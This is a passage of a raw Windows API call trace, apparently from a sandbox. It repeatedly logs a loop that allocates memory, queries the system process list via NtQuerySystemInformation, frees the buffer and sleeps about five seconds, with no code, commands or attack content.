returned 0x0 [0257.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.213] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.232] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.336] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.343] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0257.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0257.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0257.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0257.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0257.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0257.373] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0257.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 